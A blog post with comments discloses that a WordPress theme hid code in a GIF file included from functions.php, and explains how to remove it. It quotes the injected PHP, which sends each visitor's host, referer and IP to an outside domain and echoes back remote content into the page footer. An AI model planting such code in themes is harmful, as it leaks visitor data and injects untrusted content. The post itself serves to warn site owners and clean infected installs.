HireWordPressExperts.com has excellent themes…for me to poop on
Posted by HuilaajaNov 8
Warning: URL file-access is disabled in the server configuration
After installing one of the HireWordPressExperts.com theme, I got warning on my frontpage that it’s not safe to load scripts file_get_contents() from http://24365online.com/_YTG_yu/_dl/get_info.php?…
Warning directed me to look script from general-template.php file and I found suspicious script:
/*** HWEDLC ***/
…
$url = “http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip”;
$content = file_get_contents($url);
echo $content;
After removing the script and refresing browser warning was gone, but second refresh brought back the same warning
I was sure this warning is caused some of the new theme files, so I tried to search similar content from inside of these files. Unfortonately Windows isn’t indexing php files, but lucily Visual Studio was able to find file. Surprisingly string was found from image file wp.gif. Soon I discovered that functions.php file tried to include wp.gif file into source code. Wp.gif file was adding additional code into get_footer function.
In the end solution was quite simple:
- Remove wp.gif file
- Remove include or require command from functions.php
- Clean the get_footer function from wp-includes/general-template.php file
I’m still believe in that the script is just a advertice, but HireWordPressExperts.com could do example XSS vulnerability into your service or mess up the layout.
Would you hire “experts” that are using this kind of marketing strategies?
- Tags: blog, bug, theme, wordpress | Filed under: Software development
5 comments
Comment by Assassini on 5.1.2010 at 11:50
Thank you for this, I managed to clean my theme.
Comment by marcus kamps on 12.1.2010 at 13:54
I also noticed this script in a theme I downloaded. It included wp.gif in header.php, and had some base64 info in the footer that also resolved to spam links. The wp.gif script also inserted some records into the database, including – you guessed it – a link back to them in wp_links. They must be pretty hungry for PageRank.
I noticed this not because it threw an error, but because it dropped some suspicious characters (“:::::”) in my footer. I like how they even give themselves credit by including their initials in the comment (“HWEDLC” = Hire Wordpress Experts Download Content). Classy.
Thanks for posting.
Pingback by 饭盒 » Blog Archive » 关于某些WP themes中出现http://24365online.com的问题 on 27.3.2010 at 04:24
[...] http://blog.huilaaja.net/2009/11/08/hirewordpressexperts-com/ 三月 27th, 2010 [...]
Comment by Claudia on 30.5.2010 at 18:20
Did get the same error but the call to function was not involving anything related to a .gif file; anyway it’s annoying!
Thanks for the useful tips.
Pingback by Praxiswissen WordPress » WordPress – Vorsicht bei Themes unbekannter Herkunft! on 1.6.2010 at 21:28
[...] perfide war, dass der fragwürdige Code nicht etwa innerhalb einer PHP-Datei versteckt war, sondern in einer Bilddatei namens wp.gif. Darauf muss man auch erstmal [...]